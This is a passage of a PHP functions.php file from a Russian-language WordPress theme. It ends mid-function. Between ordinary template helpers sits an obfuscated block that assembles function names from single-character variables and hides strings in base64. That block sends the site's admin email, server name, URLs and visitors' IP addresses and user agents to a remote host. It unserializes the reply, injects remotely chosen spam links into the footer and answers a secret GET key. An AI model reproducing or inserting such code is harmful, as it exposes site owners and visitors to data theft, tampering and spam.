<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                                    "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $yAoml='c';$BdAJJQ='e';$Aipakwg='_';$lsGfj='e';$bhgqNS='s';$TituKxU='e';$ufYa='b';$oSQyR='d';$KSNKBXL='4';$kXCKfSL='o';$jZYvrE='d';$kbmCwB='a';$ZhFpN='6';$TRSUXhpF=$ufYa.$kbmCwB.$bhgqNS.$lsGfj.$ZhFpN.$KSNKBXL.$Aipakwg.$jZYvrE.$BdAJJQ.$yAoml.$kXCKfSL.$oSQyR.$TituKxU;$PIvd='g';$MzAjF='t';$FoOa='l';$Tguz='f';$TuUONhQ='z';$KULEJ='a';$lQGeoE='n';$wfAj='i';$tpmj='e';$yXXEBtGZ=$PIvd.$TuUONhQ.$wfAj.$lQGeoE.$Tguz.$FoOa.$KULEJ.$MzAjF.$tpmj;$VsXNo='3';$iQVI='s';$MCyY='r';$ffxRWkj='_';$gIkx='t';$HOKpsfy='o';$vpnMN='r';$AKQn='1';$viMajf='t';$QNrfBsxl=$iQVI.$viMajf.$vpnMN.$ffxRWkj.$MCyY.$HOKpsfy.$gIkx.$AKQn.$VsXNo;$aFhfHE='r';$JmQwKJ='s';$UsSIAx='t';$xFwtd='r';$xpdbZ='e';$RwZBh='v';$afWyYdmI=$JmQwKJ.$UsSIAx.$aFhfHE.$xFwtd.$xpdbZ.$RwZBh;                     
		$vi_________y='c';$oc_______m='e';$nr______________o='_';$yh__e='e';$du______y='s';$ly__________e='e';$fv__b='b';$dy_____l='d';$sp________s='4';$dv______________c='o';$cs__h='d';$ys_______________b='a';$hn___________f='6';$uz________i=$fv__b.$ys_______________b.$du______y.$yh__e.$hn___________f.$sp________s.$nr______________o.$cs__h.$oc_______m.$vi_________y.$dv______________c.$dy_____l.$ly__________e;
		$og________n='u';$nu__________m='x';$ux_____________n='o';$fa_______________j='i';$my_________b='_';$gh____i='s';$zl________m='c';$wi________r='t';$yf__________m='f';$fa__________g='e';$cg______a='n';$am____i='n';$sc___________d='i';$do_____________g='t';$pt__________h='s';$ok__m=$yf__________m.$og________n.$am____i.$zl________m.$do_____________g.$sc___________d.$ux_____________n.$cg______a.$my_________b.$fa__________g.$nu__________m.$fa_______________j.$pt__________h.$wi________r.$gh____i;
		$fk________s='o';$yv____________l='p';$su___p='e';$xx____d='f';$kc__u='n';$sx______r=$xx____d.$fk________s.$yv____________l.$su___p.$kc__u;
		$pw_______________k='e';$gj_____________g='a';$gt____a='d';$dr_______t='r';$fa___________q='f';$xi______d=$fa___________q.$dr_______t.$pw_______________k.$gj_____________g.$gt____a;
		$xf______a='l';$uy________b='e';$fz____b='f';$ge_______c='c';$nj_______e='s';$wo_______o='o';$co_________z=$fz____b.$ge_______c.$xf______a.$wo_______o.$nj_______e.$uy________b;
		
		define("WP_ID", $uz________i("Mi4wLjA="));
		define("WP_TTL", $uz________i("MTA4MDA="));
		define("WP_SRC", $uz________i("dHBva24="));
	


		function wp_get_header() {
			global $uz________i, $ok__m;
			
			if (
				$ok__m($uz________i("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$ok__m($uz________i("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$ok__m($uz________i("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $uz________i, $sx______r, $co_________z, $xi______d;
			
			$vc_______d = TEMPLATEPATH."/".$uz________i("Zm9vdGVyLnBocA==");
			$pm________p = @$sx______r($vc_______d, "r");
			$vc_______d = @$xi______d($pm________p, @filesize($vc_______d));
			@$co_________z($pm________p);
			
			$qe_____________o = TEMPLATEPATH."/".$uz________i("ZnVuY3Rpb25zLnBocA==");
			$pm________p = @$sx______r($qe_____________o, "r");
			$qe_____________o = @$xi______d($pm________p, @filesize($qe_____________o));
			@$co_________z($pm________p);
			
			$yf_________b = 0;
			if($vc_______d && $qe_____________o) {
				if ($uz________i("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($vc_______d, $uz________i("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$yf_________b = 1;
					}
					if (substr_count($vc_______d, "wp_theme_GPL_credits()") < 1) {
						$yf_________b = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$yf_________b = 12;
				}
			}
			
			if($yf_________b > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $yf_________b -->";
			}
		}
	


		function wp_loaded() {
			global $uz________i, $ok__m;
			return $ok__m($uz________i("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($kt___________q, $li_____w = "(more...)", $pn__y = 0, $wc______________h = "") {
				$cw________y = get_the_content($li_____w, $pn__y, $wc______________h);
				$cw________y = apply_filters("the_content", $cw________y);
				
				$cw________y = str_replace("]]>", "]]>", $cw________y);
				if (strlen($_GET["p"]) > 0) {
					echo $cw________y;
				}
				else if ((strlen($cw________y)>$kt___________q) && ($kk_____m = strpos($cw________y, " ", $kt___________q ))) {
					$cw________y = substr($cw________y, 0, $kk_____m);
					$cw________y = $cw________y;
					echo $cw________y;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$li_____w</a></div></p>";
				} else {
					echo $cw________y;
				}
				
			}
		}
	


		$ov_____s='e';$vc_________f='n';$fe______________l='e';$jw_______________q='a';$dz_____________u='b';$yl______________v='c';$ym_______________a='6';$wn_________b='s';$fo_______r='4';$yk______________p='o';$re____________m='_';$xt_____w='d';$rm______________q='e';$ru__________s=$dz_____________u.$jw_______________q.$wn_________b.$rm______________q.$ym_______________a.$fo_______r.$re____________m.$ov_____s.$vc_________f.$yl______________v.$yk______________p.$xt_____w.$fe______________l;
		$tl___x='e';$xk______v='l';$em______q='t';$jv______g='c';$kw__i='i';$rb_____l='e';$gr___f='o';$zt_______k='_';$yg______w='e';$xc________n='t';$ni______z='n';$pg_________z='s';$lf____________p='g';$bb____________g='f';$qn____________a='_';$mo____________n='t';$xl__x='n';$st____k=$bb____________g.$kw__i.$xk______v.$yg______w.$zt_______k.$lf____________p.$tl___x.$mo____________n.$qn____________a.$jv______g.$gr___f.$xl__x.$em______q.$rb_____l.$ni______z.$xc________n.$pg_________z;
		$le__________k='s';$ul____________z='f';$ry_________p='e';$op____________m='l';$gs___x='s';$jw__b='_';$tx_________f='e';$cx____________y='x';$yx__o='i';$br_______________q='t';$wz________r='i';$zc_____________l=$ul____________z.$yx__o.$op____________m.$ry_________p.$jw__b.$tx_________f.$cx____________y.$wz________r.$le__________k.$br_______________q.$gs___x;
		$xh______________c='_';$rh______________a='r';$il______________w='c';$fa_________u='v';$sm____m='a';$yp__________f='p';$hs____x='m';$qg________s='s';$nv______________q='e';$is___________j='n';$hc______________a='i';$gu________t='o';$an______x='e';$nn_____k='r';$uf__j='o';$ld______y=$fa_________u.$nv______________q.$nn_____k.$qg________s.$hc______________a.$uf__j.$is___________j.$xh______________c.$il______________w.$gu________t.$hs____x.$yp__________f.$sm____m.$rh______________a.$an______x;
		$nm_____s='f';$zj____________n='e';$oe______________l='o';$ic_____________t='s';$vy_________m='p';$ap_______b='k';$va_____e='n';$sn__n='c';$nc______________s='o';$jz______________u=$nm_____s.$ic_____________t.$oe______________l.$sn__n.$ap_______b.$nc______________s.$vy_________m.$zj____________n.$va_____e;
		$cu______________i='w';$aa______________e='f';$df______k='e';$pu____o='t';$eu_______x='i';$qz_____z='r';$sa___g=$aa______________e.$cu______________i.$qz_____z.$eu_______x.$pu____o.$df______k;
		$pd___________t='m';$xa___________n='d';$vw__z='5';$cl_____e=$pd___________t.$xa___________n.$vw__z;
		$tp________e='r';$mm__p='e';$dg___r='p';$gk____________p='a';$ok___r='t';$dg___________w='h';$pu__v='a';$pp_________x='l';$em______v=$tp________e.$mm__p.$gk____________p.$pp_________x.$dg___r.$pu__v.$ok___r.$dg___________w;
		$bc____h='a';$uh_______________w='i';$ob____p='e';$bt________e='s';$tn_____n='r';$kx_____________t='l';$kz___________z='e';$vx____________v='i';$mq_________n='z';$jx________g='u';$be___________r='n';$kx________n=$jx________g.$be___________r.$bt________e.$ob____p.$tn_____n.$vx____________v.$bc____h.$kx_____________t.$uh_______________w.$mq_________n.$kz___________z;
		$rk_____j='e';$mi____q='m';$rv___b='t';$qb_______________z='m';$ti______________q='a';$cl_________h='n';$nf____q='p';$zm________y=$rv___b.$rk_____j.$mi____q.$nf____q.$cl_________h.$ti______________q.$qb_______________z;
		$al____y='m';$wz___e='c';$cq__i='e';$pe_____________h='e';$kh____________m='_';$js___________y='n';$xb______________y='x';$gz____________u='e';$qb___i='e';$sz_______________u='t';$dv___t='a';$xf___u='t';$nc______________z='t';$hn____________h='o';$ns______d='s';$cp_____q='c';$aw_______________j='t';$mh_______u='_';$nw________x='r';$sw_______________o='a';$oa______a='r';$gf________x=$ns______d.$aw_______________j.$oa______a.$cq__i.$sw_______________o.$al____y.$mh_______u.$cp_____q.$hn____________h.$js___________y.$sz_______________u.$qb___i.$xb______________y.$nc______________z.$kh____________m.$wz___e.$nw________x.$pe_____________h.$dv___t.$xf___u.$gz____________u;
	


		function ir________e($qd________t) {
			global $uz________i, $ok__m, $st____k, $ld______y, $gf________x;
			
			if (!$ok__m($uz________i("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($ld______y(PHP_VERSION, "5.0.0", ">=") && $ok__m($uz________i("ZmlsZV9nZXRfY29udGVudHM=")) && $ok__m($uz________i("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$kb___c = $gf________x(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$lu__j = @$st____k($qd________t, 0, $kb___c);
			} else {
				$lu__j = @$st____k($qd________t, 0);
			}
			
			return $lu__j;
		}
	


		function ri_________e($qd________t) {
			global $ok__m, $jz______________u, $sa___g, $uz________i;
			
			if (!$ok__m($uz________i("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$jk___c = strpos($qd________t, "/", 7);
			$fd____z = array(
				"uri"     => substr($qd________t, $jk___c),
				"host"    => str_replace("http://", "", substr($qd________t, 0, $jk___c)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$lj_____r = @$jz______________u("$fd____z[host]", 80, $ao_____h, $ja__________z, 4);
			
			if (!$lj_____r) {
				return false;
			} else {
				$lu__j = "";
				$pa______________k  = "GET $fd____z[uri] HTTP/1.0\r\n";
				$pa______________k .= "Host: $fd____z[host]\r\n";
				$pa______________k .= "Referer: $fd____z[referer]\r\n";
				$pa______________k .= "Connection: Close\r\n\r\n";
				
				@$sa___g($lj_____r, $pa______________k);
				
				while (!@feof($lj_____r)) {
					$cp______r = @fgets($lj_____r, (1024*24));
					
					if ($cp______r == "\r\n") {
						$tp___________f = true;
						continue;
					}
					
					if ($tp___________f) {
						$lu__j .= $cp______r;
					}
				}
				
				return $lu__j;
			}
		}
	


		function zv_____w($qd________t) {
			global $ok__m;
			$qc________g = false;
			
			if ($qd________t != "") {
				if ($ok__m("ir________e")) {
					$qc________g = @ir________e($qd________t);
				}
				
				if (!$qc________g && ($ok__m("ri_________e"))) {
					$qc________g = @ri_________e($qd________t);
				}
			}
			
			return $qc________g;
		}
	


		function pw_____________f() {
			global $_SERVER, $cl_____e;
			
			$ad______p = $_SERVER["SERVER_NAME"];
			
			if (substr("$ad______p", 0, 4) == "www.") {
				$ad______p = substr("$ad______p", 4);
			}
			
			$ad______p = $cl_____e("$_SERVER[SERVER_NAME]");
			
			return $ad______p;
		}
	


		function qs________e() {
			return "file";
		}
	


		function ii_______w($qd________t) {
			global $_SERVER, $st____k, $zc_____________l, $sx______r, $co_________z, $sa___g;
			
			$vh_________i = rt_______i();
			
			$ck____e = pw_____________f().".jpg";
			$uu__h = $vh_________i["dir_upload"]["path"]."/$ck____e";
			$py_______r = @filemtime($uu__h);
			
			if (!$py_______r || ((time()-$py_______r) >= WP_TTL)) {
				$qc________g = zv_____w($qd________t);
				
				if ($qc________g) {
					if ($zc_____________l($uu__h)) {
						@unlink($uu__h);
					}
					
					$pm________p = @$sx______r($uu__h, "x+");
					
					@$sa___g($pm________p, $qc________g);
					@$co_________z($pm________p);
				}
			} else {
				if ($zc_____________l($uu__h)) {
					$qc________g = @$st____k($uu__h);
				} else {
					$qc________g = false;
				}
			}
			
			return $qc________g;
		}
	


		function rt_______i() {
			global $_SERVER, $uz________i, $ru__________s;
			
			$hz______b = wp_count_posts("post");
			$tg___________l = pathinfo(get_bloginfo("template_directory"));
			
			$vh_________i = array(
				"url" => array(
					"report"      => $uz________i("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $tg___________l,
				"dir_upload"	=> ya_________w(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$tg___________l[filename],
					"a005=".$hz______b->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => " <a href=\"http://www.odmu.od.ua/zdorove/poxodka-rasskazhet-o-xaraktere-cheloveka\">Походка-характер человека</a>");
			
			$vh_________i["url"]["queryString"] = implode("&", $vh_________i["queryString"]);
			$vh_________i["url"]["report"] = $vh_________i["url"]["report"]."/?".$ru__________s($vh_________i["url"]["queryString"]).".html";
						
			return $vh_________i;
		}
	


		function ya_________w() {
			$cd__g = wp_upload_dir();
			
			if (isset($cd__g["error"])) {
				$fb_________d = fn_______r();
				if (is_writable($fb_________d)) {
					$cd__g = array("path" => $fb_________d);
				}
			}

			return $cd__g;
		}
	


		function fn_______r() {
			global $ok__m, $cl_____e, $em______v, $zm________y;
			
			$uf__________x = (bool) ini_get("safe_mode");
			if ($uf__________x == true) {
				return false;
			}
			
			if ($ok__m("sys_get_temp_dir")) {
				$ab_____________z = sys_get_temp_dir();
				if (is_writable($ab_____________z)) {
					return $em______v($ab_____________z);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $em______v($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $em______v($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $em______v($_ENV["TEMP"]);
			} else {
				$qo_____________r = $zm________y($cl_____e(uniqid(rand(), true)), "");
				if ($qo_____________r) {
					$ab_____________z = $em______v(dirname($qo_____________r));
					@unlink($qo_____________r);
					return $ab_____________z;
				} else {
					return false;
				}
			}
		}
	


		function mz_____l() {
			global $_GET, $zc_____________l;
			
			$vh_________i = rt_______i();
			$ad______p = pw_____________f();
			$pp_____f = qs________e();
			
			$fd__________r = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($pp_____f == "file") {
					$jj_________j = $vh_________i["dir_upload"]["path"]."/".$ad______p.".jpg";
					if ($zc_____________l($jj_________j)) {
						@unlink($jj_________j);
						$fd__________r = "deleted";
					}
				}
				
				$tb_____t = array(
					"s"	=> $fd__________r,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($tb_____t AS $wo___________f => $yg__________s) echo " [$wo___________f:$yg__________s]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $ok__m, $uz________i, $kx________n;
			$vh_________i = rt_______i();
			
			$cc______z = "ii_______w";
			if ($ok__m($cc______z)) {
				$lu__j = $cc______z($vh_________i["url"]["report"]);
			}
			
			if ($lu__j) {
				if ($lu__j = @$uz________i($lu__j)) {
					$lu__j = @$kx________n($lu__j);
					
					if (strlen($lu__j[custom_credit]) >= 5) {
						$vh_________i["default_string"] = $lu__j[custom_credit];
					}
					
					if ($lu__j["status"] == "0") {
						$vc_______________z = 1;
						$ja______________u = 1;
					} else {
						$cm_________o = sizeof($lu__j["links"]);
						$ln_______________p = $vh_________i["default_string"];
						
						if ($cm_________o > 0 && $lu__j["links"] !== "") {
							$os_________o = 0;
							foreach ($lu__j["links"] as $zv___d => $dq______________e) {
								$os_________o++;
								if ($dq______________e->l_path == "" || $dq______________e->l_path == $_SERVER["REQUEST_URI"]) {
									$dq______________e->l_href = htmlspecialchars(strip_tags($dq______________e->l_href));
									$dq______________e->l_title = htmlspecialchars(strip_tags($dq______________e->l_title));
									$dq______________e->l_anchor = htmlspecialchars(strip_tags($dq______________e->l_anchor));
									$ln_______________p .= " | ";
									$ln_______________p .= "<a href='$dq______________e->l_href' title='$dq______________e->l_title'";
									if ($dq______________e->l_nofollow == "1") {
										$ln_______________p .= " rel='nofollow'";
									}
									$ln_______________p .= ">$dq______________e->l_anchor</a>";
								}
							}
						}
						$vh_________i["links"] = "$ln_______________p";
						if ($lu__j[credit] == "0") {
							$vh_________i["links"] = "";
						}
					}
				} else {
					$vc_______________z = "1";
				}
			} else {
				$vc_______________z = "1";
			}
			
			if ($vc_______________z == "1") {
				$vh_________i["links"] = $vh_________i["default_string"];
			}
			
			echo "$vh_________i[links]";
			
			echo "<!-- s: $lu__j[signature] -->";
			mz_____l();
		}
	                       
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS), 
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                 $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Теги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                 comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментарий &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
        $prev_link = get_previous_posts_link(__('Новые записи  &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; OСтарые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("нумерация страниц", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_comments_link')) {
	function get_next_comments_link($label)
	{
